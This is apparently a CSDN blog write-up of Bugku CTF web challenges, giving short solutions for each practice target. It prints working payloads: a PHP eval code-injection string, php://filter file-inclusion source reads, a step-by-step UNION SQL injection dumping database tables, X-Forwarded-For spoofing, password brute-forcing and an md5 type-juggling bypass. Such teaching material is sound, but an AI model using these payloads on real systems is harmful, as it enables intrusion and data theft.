bugku web篇

最新推荐文章于 2024-05-06 20:15:00 发布
最新推荐文章于 2024-05-06 20:15:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: ctf 文章标签: bugku web ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Is_Linmouren/article/details/102843844
版权

web2

f12查看源代码在注释语句里面

计算器

直接求给的题目

但是对input的最大输入个数做了限制可以直接f12改限制字数也可以bp抓包修改

web基础$_GET

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

地址栏直接传一个?what=flag

web基础$_POST

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

用火狐的hackbar插件传一个post参数what=flag

矛盾

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';

这题考察了php“==”的特性吧;在php中==于只会去判段他的值是否相等,

在不同数据类型的比较当中他会进行强制的类型转换例如 1==1a去比较的时候

会认为1a=1. 这也和php是弱类型有关

php弱类型

弱类型就是在声明一个变量的时候不用定义他的类型

例如

$a=1

$b='1'

正常情况下$a会被解析为int

$b会被解析为字符串型

看上去是很方便但是主要在两个变量比较的时候就后又问题

$a==$b的时候返回值是true这就会产生漏洞

 "0e132456789"=="0e7124511451155" //true

"0e123456abc"=="0e1dddada"	//false

"0e1abc"==0     //true

"0x1e240"=="123456"		//true

"0x1e240"==123456		//true

"0x1e240"=="1e240"		//false

例如服务器储存密码的时候如过加密后是0e12sdasd这样的

与‘0’做比较返回值是true

所以在作比较的时候尽量用===

web3

打开一直在弹框;直接吧js禁用(火狐可以直接阻止弹框)

f12见检查在script代码里面有一串加密字符看了一些是HTML编码直接拉到解码工具里面解开就得到flag了

域名解析

打开开主机的host文件配置一下就好了


# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
	123.206.87.240        flag.baidu.com

然后访问flag.baidu.com 就可以得到flag

你必须让他停下

打开发现一直在跳转开源码看一下发现这么段js代码

<script language="JavaScript">
function myrefresh(){
window.location.reload();
}
setTimeout('myrefresh()',500); 
</script>

直接上bp放到repeater上一直go ,flag就会出来

本地包含

<?php
    include "flag.php";
    $a = @$_REQUEST['hello'];
    eval( "var_dump($a);");
    show_source(__FILE__);
?>

$_REQUEST

说明

默认情况下包含了$_GET,$_POST 和 $_COOKIE的数组。

eval()定义和用法

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

**注释:**return 语句会立即终止对字符串的计算。

**提示:**该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。

只要构建恶意pload吧flag.php里面的东西打印出来就好了?hello=1);print_r(file("./flag.php")

变量1

<?php  

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
?>

先看if里面的正则要求$arg由数字字母下划线组成

http://123.206.87.240:8004/index1.php?args=GLOBALS

那就直接这个形式让他打印全局变量

 ["ZFkwe3"]=> string(38) "flag{92853051ab894a64f7865cf3c2128b34}"

全局变量ZFkwe3里的flag就会被打印出来

web5

直接查看源代码

<div style="display:none;">([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+[]])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]])</div>

发现一串这样的东西放到控制台直接回车就得到ctf{whatfk}全大写就是flag

头等舱

啥也没有,直接上bp,bp拦下来的数据包看上去也正常,放到repeater里面go一下flag直接出现在请求头里面。

网站被黑

御剑扫一下发现还一个http://123.206.87.240:8002/webshell/shell.php

发现是一个后门pass直接开始爆破简单尝试发现是hack直接出flag

管理员系统

刚开始以为是注入题尝试后提示:

IP禁止访问,请联系本地管理员登陆,IP已被记录.

f12 发现一个base64加密码 解开是test123

于是猜这个是密码

管理员账户密码就是admin

上bp

直接在包头加上X-FORWARDED-FOR:127.0.0.1

ok直接出flag

web4

提示查看源码

<script>
var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%64%22%29%3b%69%66%28%22%75%6e%64%65%66%69%6e%65%64%22%21%3d%74%79%70%65%6f%66%20%61%29%7b%69%66%28%22%36%37%64%37%30%39%62%32%62';
var p2 = '%61%61%36%34%38%63%66%36%65%38%37%61%37%31%31%34%66%31%22%3d%3d%61%2e%76%61%6c%75%65%29%72%65%74%75%72%6e%21%30%3b%61%6c%65%72%74%28%22%45%72%72%6f%72%22%29%3b%61%2e%66%6f%63%75%73%28%29%3b%72%65%74%75%72%6e%21%31%7d%7d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%6c%65%76%65%6c%51%75%65%73%74%22%29%2e%6f%6e%73%75%62%6d%69%74%3d%63%68%65%63%6b%53%75%62%6d%69%74%3b';
eval(unescape(p1) + unescape('%35%34%61%61%32' + p2));
</script>

直接控制台unescape(p1) + unescape('%35%34%61%61%32' + p2)一下

function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;

然后将字符串:67d709b2b54aa2aa648cf6e87a7114f1填入输入框,提交可得flag

flag在index里

看见题目就大概知道是本体文件包含的漏洞

进去点击链接进到了这个文件

http://123.206.87.240:8005/post/index.php?file=show.php

直接

http://123.206.87.240:8005/post/index.php?file=index.php

不行需要查看源码

构建payload

http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

用了php流的filter协议访问本地文件read=convert.base64-encode以bases64加密源码,resource=index.php读取目标文件

把的得到的一解码就得到flag了。

输入密码查看flag

链接里直接说了爆破题题目里又直接告诉我5位数密码

直接上bp的intruder

稍微设置一下从10000到99999步长为1

也可以直接写个字典

然后爆破出来密码是13579

输入flag就出来了

点击一百万次

网站也死掉了

之前做是直接通过hackbar传一个post值大于100000就ok了

备份是个好习惯

直接访问http://123.206.87.240:8002/web16/index.php.bak

就开始下载index.php.bak了 用编辑器打开就index.php的源码

<?php

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str, 1);
$str = str_replace('key', '', $str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if (md5($key1) == md5($key2) && $key1 !== $key2) {
    echo $flag . "取得flag";
}
?>

有个key关键字的过滤那就直接kekeyy

对key1,key2的值进行md5加密,并进行比较,如果md5加密的值一样而未加密的值不同,就输出flag.

palyload:http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2

okl

成绩单

一道非常典型的sql注入题

1,2,3正常返回

1' order by 4#返回正常1' order by 5#异常说明一个4列数据

先手历一下-1' union select 1,2,3,4#正常直接开始爆库

-1' union select 1,2,3,database()#得到数据库skctf_flag

接着爆表

-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

得到表名fl4g,sc

爆字段

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

直接可以查数据了

id=-1' union select 1,2,3,skctf_flag from fl4g#

就直接得到flag。

秋名山老司机

因为要2s内算出我反正是做不到的

用python直接扒下来再发送一个post请求

import requests
import re
from bs4 import BeautifulSoup

url = "http://123.206.87.240:8002/qiumingshan/"
session = requests.session()
r = session.get(url)
r.encoding = "utf8"
print(r.text)

a = re.compile(r"<div>(.*?)</div>")
div = re.findall(r"<div>(.*?)</div>", r.text)
print(div)

soup = BeautifulSoup(r.text,"html5lib")
for div in soup.select('div'):
    calc = div.text
    calc = calc[:-3]
    result = eval(calc)
    result = {"value":result}
    r = session.post(url,data=result)
    print(r.text)

可能网络波动原因有的时候出不来,多run几次就会出来。

速度要快

源码里有

<!-- OK ,now you have to post the margin what you find -->

啥都不知道先抓个包

go一下发现再包头里有一个flag但是每次都不一样

flag: 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT0RrMU9UYzA=

base64解码看看

跑的还不错,给你flag吧: ODk1OTc0

大概有点头绪了

